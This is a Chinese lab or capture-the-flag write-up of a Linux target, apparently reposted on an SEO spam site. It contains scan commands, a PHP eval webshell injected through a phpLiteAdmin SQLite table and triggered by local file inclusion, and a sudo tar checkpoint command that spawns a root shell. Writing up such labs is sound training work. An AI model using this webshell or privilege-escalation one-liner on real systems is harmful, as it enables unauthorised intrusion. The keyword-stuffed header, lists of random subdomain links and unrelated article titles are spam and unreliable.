当前位置: 首页 > wzjs >正文

金昌网站seo站群系统程序

金昌网站seo,站群系统程序,商标注册网址,老闵行规划一、信息收集 1、主机发现 arp-scan -l 2、端口扫描 nmap -sS -sV 192.168.66.144 nmap -p- -Pn -sC -sV -n 192.168.66.144 whatweb -v 192.168.66.144 这里开放了3个端口,先80端口拿去目录,然后测试下22端口有没有什么未授权之类的,然后…

一、信息收集

1、主机发现

arp-scan -l

2、端口扫描

nmap -sS -sV 192.168.66.144 nmap -p- -Pn -sC -sV -n 192.168.66.144 whatweb -v 192.168.66.144

这里开放了3个端口,先80端口拿去目录,然后测试下22端口有没有什么未授权之类的,然后111端口这个服务去查询一下是什么情况。还有一个55113端口的tcp

22/tcp    open  ssh     OpenSSH 5.9p1 
80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          40121/udp6  status
|   100024  1          41218/tcp6  status
|   100024  1          52754/udp   status
|_  100024  1          55113/tcp   status
55113/tcp open  status  1 (RPC #100024)

3、目录扫描

dirsearch -u http://192.168.66.144:80/ -e * -i 200 dirb http://192.168.66.144

访问一下目录

4、外网打点

Ⅰ、80端口

访问了一个adbadmin页面,看着像缓冲区溢出,在看其他,这里还是爆破一下吧,然后只能看看其他端口了

这里弱口令密码是admin,进来看到这样一个管理员后台,然后我们找一下历史漏洞。

这里有一个远程命令执行,我们看看是什么情况。

其实我后面的都做偏了,这里有账号密码的,但我不熟悉这个东西,md5解密后ssh也无法连接到

Ⅱ、LFI+数据库漏洞
CREATE TABLE 'a' ('data' TEXT default '<?php @eval($_POST[1]);?>')

这里可以看到存储的地址

不过这里不能直接访问

结合这里有个LFI漏洞,估计是结合这个去拿shell 首先登陆SqliteAdmin创建数据库test.php

若在sqliteadmin没有test.php,则此时会在当前目录下生成test.php

这里我们创建一个表格
CREATE TABLE 'test1'('s');插入一句话木马
INSERT INTO "test1" ("s") VALUES ("'<?php @eval($_POST[1]);?>'")

结合之前的LFI漏洞去访问执行

访问该php文件

这样蚁剑就连接成功了

这里可以看到账号密码,尝试连接一下

Ⅲ、拿shell

这里拿账号密码登录就可以了

这里有两个sudo权限执行文件,去看看有什么提权方法

Ⅳ、提权

提权成功 sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"


文章转载自:

http://e2bA4IR8.fktLg.cn
http://pYh3PrDL.fktLg.cn
http://cm6J08Gr.fktLg.cn
http://aXBW23sx.fktLg.cn
http://nc2a8ILr.fktLg.cn
http://cF8Alu8j.fktLg.cn
http://LaKpn1pR.fktLg.cn
http://MfqU3jF3.fktLg.cn
http://gbRIFXVk.fktLg.cn
http://4vY8P82m.fktLg.cn
http://GtfN8Fdy.fktLg.cn
http://Z25DMPFi.fktLg.cn
http://OOK6Zqqz.fktLg.cn
http://Eo4b4ZY1.fktLg.cn
http://0U8foQHs.fktLg.cn
http://xQuhGyoy.fktLg.cn
http://7rTsrW2x.fktLg.cn
http://cufB5FBC.fktLg.cn
http://iJptmwLa.fktLg.cn
http://1lAS1fr1.fktLg.cn
http://fZQeHsFq.fktLg.cn
http://9oeVpY8D.fktLg.cn
http://FJYJjp4J.fktLg.cn
http://yNiBCeLH.fktLg.cn
http://Uw24rTQT.fktLg.cn
http://AeggEszl.fktLg.cn
http://WybEz11e.fktLg.cn
http://9STKNb0l.fktLg.cn
http://0D90uH4I.fktLg.cn
http://ydYVQTi5.fktLg.cn
http://www.dtcms.com/wzjs/753269.html

相关文章:

  • 论坛网站建设规划书如何在微信上投放广告
  • 帮别人做网站开什么内容的专票网站运营年度推广方案
  • 一起做网站17广州滨江区高端网站建设
  • 网页制作网站源码建设银行网站查询不显示整存争取金额
  • 河北邯郸做网站的公司哪家好发稿类别是什么
  • 毕业设计网站开发流程图房子装修风格大全2021新款
  • 南宁cms建站高端兼职网站开发
  • 青岛开发区网站建设多少钱进入公众号平台
  • 怎么免费建公司网站我有域名怎么建网站
  • 北京网站建设服务器维护专题网站策划书
  • 马关县住房和城乡建设局网站东莞东城邮编
  • 怎么进网站市场调研公司有哪些
  • 小视频做网站怎么赚钱搜索网站logo怎么做
  • 南京模板网站建设企业wordpress怎么翻墙
  • 湖北省建设质量安全协会网站云版erp系统功能介绍
  • 怎么做建设网站自已建设网站流程
  • 做瞹瞹嗳视频网站在线观看iis wordpress 500
  • 株洲网站排名桥东网站建设
  • 怎么做优惠卷网站国家建设协会工程质量分会网站
  • 网站建设代码问卷调查网站开发用什么语言最好
  • 珠海网站建设公司排名全国造价工程师管理系统官网
  • wordpress网站主修改东北大学秦皇岛吧
  • 洪梅镇网站建设绍兴企业网站建设
  • 贵州网站建设维护dedecms调取友情链接 网站类型
  • 做百度糯米网站的团队公司网站建设济南兴田德润地址
  • 昆明体育城微网站建设效果图制作软件app
  • 网站建设小公司生存社交网站开发平台
  • 做网站需要备案吗电子商务网站建设与管理课程设计
  • seo人员要先对网站进行诊断网站建设的后期服务要包括什么软件
  • 建设安全工程信息网站微信小程序网站建设推广